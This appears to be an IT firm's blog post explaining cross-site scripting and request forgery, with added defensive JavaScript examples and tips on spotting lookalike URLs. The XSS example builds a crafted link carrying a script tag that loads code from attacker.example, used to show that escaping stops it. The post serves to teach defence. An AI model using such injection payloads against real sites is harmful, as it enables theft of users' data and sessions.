SandStorm IT

Common Browser-based Network Attacks and How to Avoid Them

February 16, 2021 By Jordan B. Sanders

Day by day, we do more and more through our web browsers.  At work, we check and send email, visit websites to keep up with news in our chosen fields, and use web-based operational systems, all through our browsers.  Outside of the office, we use those same browsers to check our bank account balances, purchase goods and services online, and even meet new friends.  This lets malicious actors cast an extremely wide net for would-be victims by using the web browser as an attack vector.  Let’s take a look at a couple of possible attacks and investigate how one can mitigate or entirely avoid them.

Cross-Site Scripting

Cross-site scripting is one of the most prevalent types of browser-based network attacks.  In this attack, the victim directs their browser to an exploitable website (likely one that they already trust) using a URL that carries encoded information which causes the victim’s browser to download malicious code.  The browser then executes this malicious code on the victim’s system, and the code sends sensitive information from the victim’s browser to the attacker’s server, where it is logged for later use.
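
The following added example (not from the original post) shows the website's side of the pattern described above: a page that echoes a value from the URL into its HTML, first as-is and then HTML-escaped, plus a response header that limits where scripts may load from.  The site shop.example, the q parameter and the function names are assumptions made for illustration.

```javascript
// Added example, not code from the original post. Site name, parameter
// name and the link below are constructed for illustration.

// Escape the characters that let text break out of HTML content or a
// quoted attribute value.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: the value from the URL is pasted into the page as-is, so
// markup carried in the link becomes markup in the trusted site's page.
function renderResultsUnsafe(requestUrl) {
  const q = new URL(requestUrl).searchParams.get('q') ?? '';
  return `<h1>Results for ${q}</h1>`;
}

// Hardened: the same value is escaped, so the browser displays it as text.
function renderResultsSafe(requestUrl) {
  const q = new URL(requestUrl).searchParams.get('q') ?? '';
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// Second layer: even if an escape is missed somewhere, the browser will
// refuse scripts that do not come from the site itself.
function responseHeaders() {
  return {
    'Content-Type': 'text/html; charset=utf-8',
    'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'",
  };
}

// True when the rendered page contains a real script element.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed link of the kind described above: the parameter carries markup.
const craftedLink = 'https://shop.example/search?q=' +
  encodeURIComponent('<script src="https://attacker.example/x.js"></script>');

console.log(containsScriptTag(renderResultsUnsafe(craftedLink))); // unsafe page
console.log(containsScriptTag(renderResultsSafe(craftedLink)));   // hardened page
```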

Cross-Site Request Forgery

Cross-site request forgery is another widely-used method of attack.  In this type of attack, the malicious actor causes the victim’s browser to execute actions or make website requests without the victim’s consent or knowledge.  This attack usually happens when a user is logged into their account on a website which provides account-specific functionality.  Through cross-site request forgery, the attacker can effectively act as the logged-in user as long as they can convince the victim to click specially-crafted links that execute the unauthorized actions through the victim’s account.  The victim is often unaware that the links they are clicking are executing malicious actions because the links have been injected by an attacker through an exploit in the website that the victim trusts.  This type of attack may simply be annoying (for example, the attacker could simply change the victim’s settings on the website), but it could also be very impactful if, say, a bank’s website was compromised, as the attacker may be able to initiate money transfers from the victim’s account into their own (this bank example actually happened in ING Direct’s online banking system).
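
The following added example (not from the original post, and not any bank's actual code) shows how a website can tell a request made from its own pages apart from one triggered elsewhere while the user is logged in: it checks the browser-supplied Origin header and a per-session token, and marks the session cookie SameSite.  The origin bank.example, the token value and the request shape are assumptions made for illustration.

```javascript
// Added example, not code from the original post. The origin, token
// value and request shape are constructed for illustration.
const SITE_ORIGIN = 'https://bank.example';
const STATE_CHANGING = new Set(['POST', 'PUT', 'PATCH', 'DELETE']);

// Compare tokens without stopping at the first differing character.
function tokensMatch(sent, expected) {
  if (typeof sent !== 'string' || typeof expected !== 'string') return false;
  if (sent.length === 0 || sent.length !== expected.length) return false;
  let diff = 0;
  for (let i = 0; i < sent.length; i++) {
    diff |= sent.charCodeAt(i) ^ expected.charCodeAt(i);
  }
  return diff === 0;
}

// Decide whether a request that arrived with a valid session cookie was
// really started from the site's own pages.
function checkRequest(req, session) {
  // Reads must never change state, so only state-changing methods are checked.
  if (!STATE_CHANGING.has(req.method.toUpperCase())) {
    return { allowed: true, reason: 'read-only method' };
  }
  // Browsers set Origin themselves; page script cannot forge it.
  const origin = req.headers.origin;
  if (origin !== undefined && origin !== SITE_ORIGIN) {
    return { allowed: false, reason: 'cross-site origin' };
  }
  // The token lives in the site's own form, so another site cannot supply it.
  if (!tokensMatch(req.body.csrfToken, session.csrfToken)) {
    return { allowed: false, reason: 'missing or wrong CSRF token' };
  }
  return { allowed: true, reason: 'origin and token verified' };
}

// SameSite=Lax keeps the browser from attaching the cookie to cross-site POSTs.
function sessionCookie(sessionId) {
  return `sid=${sessionId}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Constructed requests: one from the bank's own form, one triggered elsewhere.
const session = { csrfToken: 'k3Jq-constructed-token' };
const genuine = { method: 'POST', headers: { origin: SITE_ORIGIN },
  body: { to: 'savings', amount: 50, csrfToken: 'k3Jq-constructed-token' } };
const forged = { method: 'POST', headers: { origin: 'https://forum.example' },
  body: { to: 'someone-else', amount: 50 } };
console.log(checkRequest(genuine, session), checkRequest(forged, session));
```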

General Precautions

Always be sure that you have the appropriate anti-virus and anti-malware software installed, up-to-date, and running on your computer.  If an initial attack does succeed, this software can potentially stop the malicious code from executing once it arrives on your system.

In addition, a great guideline is to never click links in emails from individuals you do not know.  Emails are one of the largest entry points for exploits because it is so easy to just click a link in an email.  These links can contain information and send you to exploitable websites, which will allow an attacker to harvest any information that the exploit they are using can touch.

Along those same lines, be extra cautious when clicking any links in emails.  Even if the email is from someone you know, their email account could have been compromised, or they may be sharing malicious links without knowing it.  If you expect a link to go to a certain website, hover over it and see if you can determine what the actual URL is.  For example, if a link you expect to go to Yahoo has a URL like http://yhaoo.com/, do not click it, as it is not yahoo.com.

Another precaution to take is to double-check the URL of sites before you log in.  If you’re on a site that looks like Facebook, ensure that the URL in your browser’s location bar is https://facebook.com and not something else.  If it isn’t, you are very likely at a site which is attempting to collect your Facebook credentials for later use.
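
The hover check and the location-bar check described above can be automated, for example in a mail filter or browser extension.  The following added example (not from the original post) goes slightly beyond the two cases in the text: besides misspelled names like yhaoo.com, it flags a trusted name used as a subdomain of another site and a trusted name placed before an @ sign.  The trusted list and the function names are assumptions made for illustration.

```javascript
// Added example, not code from the original article. The trusted list and
// any links passed in are constructed for illustration.
const TRUSTED = ['yahoo.com', 'facebook.com'];

// Levenshtein edit distance: how many single-character edits turn a into b.
function editDistance(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const row = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      row[j] = Math.min(prev[j] + 1, row[j - 1] + 1, prev[j - 1] + cost);
    }
    prev = row;
  }
  return prev[b.length];
}

// Classify the host a link really points at, ignoring its visible text.
function checkLink(href) {
  let url;
  try { url = new URL(href); } catch { return { verdict: 'invalid', reason: 'not a URL' }; }
  const host = url.hostname.replace(/\.$/, '');
  // Text before "@" is a login name, not the destination.
  if (url.username || url.password) return { verdict: 'suspicious', host, reason: 'userinfo before @' };
  for (const domain of TRUSTED) {
    if (host === domain || host.endsWith('.' + domain)) {
      return url.protocol === 'https:'
        ? { verdict: 'trusted', host, reason: 'matches ' + domain }
        : { verdict: 'suspicious', host, reason: 'trusted name without https' };
    }
  }
  // Simplification: treat the last two labels as the registered domain
  // (a full check would use the Public Suffix List).
  const registered = host.split('.').slice(-2).join('.');
  for (const domain of TRUSTED) {
    if (host.startsWith(domain + '.') || host.includes('.' + domain + '.')) {
      return { verdict: 'lookalike', host, reason: domain + ' used as a subdomain of ' + registered };
    }
    if (editDistance(registered, domain) <= 2) {
      return { verdict: 'lookalike', host, reason: registered + ' is close to ' + domain };
    }
  }
  return { verdict: 'unknown', host, reason: 'not on the trusted list' };
}

console.log(checkLink('http://yhaoo.com/'));
```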

If you have any questions about these types of attacks or would like more guidance on how to make your computer systems more secure, definitely call SandStorm IT at 901-475-0275.  We’ll listen to your concerns and offer our professional advice to protect your computing infrastructure.

Categories: Cybersecurity, Networking, Personal Computing, Software & Applications
